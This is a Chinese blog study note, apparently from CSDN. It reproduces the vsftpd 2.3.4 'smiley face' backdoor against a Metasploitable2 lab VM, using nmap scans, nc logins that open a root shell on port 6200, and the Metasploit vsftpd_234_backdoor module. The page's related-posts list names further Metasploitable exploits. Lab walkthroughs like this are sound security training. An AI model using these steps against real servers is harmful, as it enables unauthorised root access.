kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)

最新推荐文章于 2024-07-24 13:04:25 发布
最新推荐文章于 2024-07-24 13:04:25 发布
阅读量3.6k 收藏 46
点赞数 4
分类专栏: 学习笔记 文章标签: linux 安全 网络 网络安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58018041/article/details/130305644
版权

此博客为本人学习笔记,如有错误,还请指正。

#vsftpd源码包含后门漏洞
#思路:开放21端口,并且vsftpd版本号为2.3.4
#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。

实验环境
攻击机:kali :192.168.111.128
靶机:Metasploitable2-Linux:192.168.111.132

Metasploitable 的用户名和密码均为:msfadmin

实验步骤

一、直接在kali终端利用漏洞

1、先测试kali与靶机的连通性
在这里插入图片描述
在这里插入图片描述
2、在kali 终端下对靶机ip地址进行扫描,查看端口情况,发现21端口是打开的

nmap 192.168.111.132

在这里插入图片描述
3、继续扫描该端口版本,发现是含有笑脸漏洞的vsftpd版本。

nmap -p 21 192.168.111.132 -sV

在这里插入图片描述4、攻击前我们先查看6200端口情况(此时端口是关闭的)

nmap -p 6200 192.168.111.132

在这里插入图片描述
5、连接21端口并通过笑脸漏洞登录

nc 192.168.111.132 21
user 任意用户名(以“:)”结尾即可)
pass 任意密码

在这里插入图片描述
6、重新打开一个终端,查看6200端口情况,发现已经打开

nmap -p 6200 192.168.111.132

在这里插入图片描述7、在控制台连接6200端口,获得shell,输入whoami,发现是root权限(要在6200端口打开的情况下才能连接成功)

nc 192.168.111.132 6200

在这里插入图片描述

二、用msfconsole利用漏洞

1、打开终端,进入msfconsole
在这里插入图片描述
2、利用search命令查找我们需要的漏洞模块vsftpd(笑脸漏洞)

search vsftpd

在这里插入图片描述
3、使用漏洞,输入命令

use exploit/unix/ftp/vsftpd_234_backdoor

或者

use 0

在这里插入图片描述4、查看需要设置的参数
在这里插入图片描述5、只需设置目标主机的IP即可
在这里插入图片描述
6、设置好后便可以开始执行攻击exploit
在这里插入图片描述7、获得靶机shell
在这里插入图片描述在这里插入图片描述

参考链接:https://blog.csdn.net/qq_51650968/article/details/121129326

如有侵权,请联系删除。

夏蝉不识冬雪
关注
  • 4
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
漏洞挖掘和利用_使用网络扫描工具搜索vsftpd ftp服务器程序的相关工具和攻击载荷,搜索出vsftpd ft
m0_54903333的博客
04-11 797
快速浏览一下网页,进入“Extensions”-“User Defined Tags”,按照步骤要求设置用户名和代码,设置完成后,单击 Submit 按钮提交。
Ftp笑脸漏洞VSFTPD 2.3.4)复现(后门漏洞
m0_62670778的博客
05-10 933
使用nmap扫描靶机的IP地址,可以看到靶机21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1027
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
Metasploitable2 靶机漏洞(上)
Fly_鹏程万里
05-02 7328
此次演示环境 1、靶机Metasploitable2-Linux IP:192.168.160.131 2、攻击演示系统 Kali Linux 1.0.9 一、弱密码漏洞(Weak Password) 安全组织索引 CVE: OSVDB: BID: 原理: 系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴...
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 4132
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
笑脸漏洞的复现
m0_64005272的博客
10-21 1430
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以连接,并且VSFTPD v2.3.4服务,是以root权限运行的,最终获取到的权限也是root。2.开启metasploitable-linux-2.0.0虚拟机,在Kali上打开一个终端,使用Kali的nmap对靶机进行端口扫描,观察靶机上的服务开放情况。注意:此时靶机的6200端口开启,完成后请勿关闭此终端,保持下图的这个状态,不然6200端口也会关闭。1.查看本机ip,打开Kali主机终端,执行ifconfig。
Metasploitable2靶机渗透学习
m0_65712192的博客
05-19 6540
Metasploitable2靶机渗透学习
Metasploitable2靶机渗透
weixin_51167520的博客
03-13 1797
Metasploitable2靶机渗透 实验环境:KALI Metasploitable2 Metasploitable2介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击网络中。 进行此次靶机
kali linux攻击靶机Metasploitable2实验------vsFTPd手工触发漏洞
边城浪子的博客
07-27 1225
漏洞vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 靶机Metasploitable2 step1:开启kali linuxMetasploitable2 step2:扫描漏洞 命令:nmap --script vuln 目标ip nmap --script vuln -p 21192.168.5...
Linux(kali)笑脸漏洞实验
Selma003的博客
04-11 2169
笑脸漏洞实战感受
metasploitable-linux-2.0.0.zip
09-01
这涵盖了Kali Linux等渗透测试工具的使用,如Nmap用于端口扫描,Nessus用于漏洞评估,Metasploit Framework则用于漏洞利用Metasploitable2-Linux是压缩包内的主要文件,它可能是ISO镜像或者VMware或VirtualBox的...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2023.3-vmware-amd64.part2.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Linux:基础命令学习
qq_55038440的博客
07-20 1511
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
LINUX之MMC子系统分析
gy794627991的博客
07-23 1102
MMC子系统从协议到源码分析
RockyLinux 9 PXE Server bios+uefi 自动化部署 RockLinux 8 9
最新发布
极致,细节
07-24 115
PXE(Preboot eXecution Environment,预启动执行环境)是一种网络启动协议,允许计算机通过网络启动而不是使用本地硬盘。PXE服务器是实现这一功能的服务器,它提供了启动镜像和引导加载程序,使得客户端计算机可以通过网络启动并安装操作系统或运行其他软件。
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2. 下载并解压upload-labs靶机安装包。您可以使用提供的链接下载`upload-labs-0.1.zip`文件。将其解压缩,并将相关文件放入容器中以供运行。 3. 确保您的Kali Linux系统满足Docker的运行要求。首先,检查当前Linux系统的内核版本,使用以下命令: `uname -a` 如果内核版本大于等于3.10,您的系统符合要求。否则,您可能需要更新内核或使用支持Docker的其他系统。 4. 更新apt源以满足下载要求。根据您的具体需求,可能需要更新apt源来获取所需的软件包。 5. 启动upload-labs靶机。根据提供的问题描述,您可能需要进行代码审计,并利用文件包含漏洞,通过URL参数来读取敏感文件。一个示例的URL可能是:`http://your-upload-labs-url/?file=/flag`,其中`your-upload-labs-url`是您部署upload-labs靶机的URL地址。您需要根据具体情况进行进一步的测试和配置。 请注意,这只是一个简要的概述,并且具体的部署步骤可能会因不同的环境和需求而有所不同。建议您参考相关文档和指南以获取更详细的部署信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夏蝉不识冬雪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值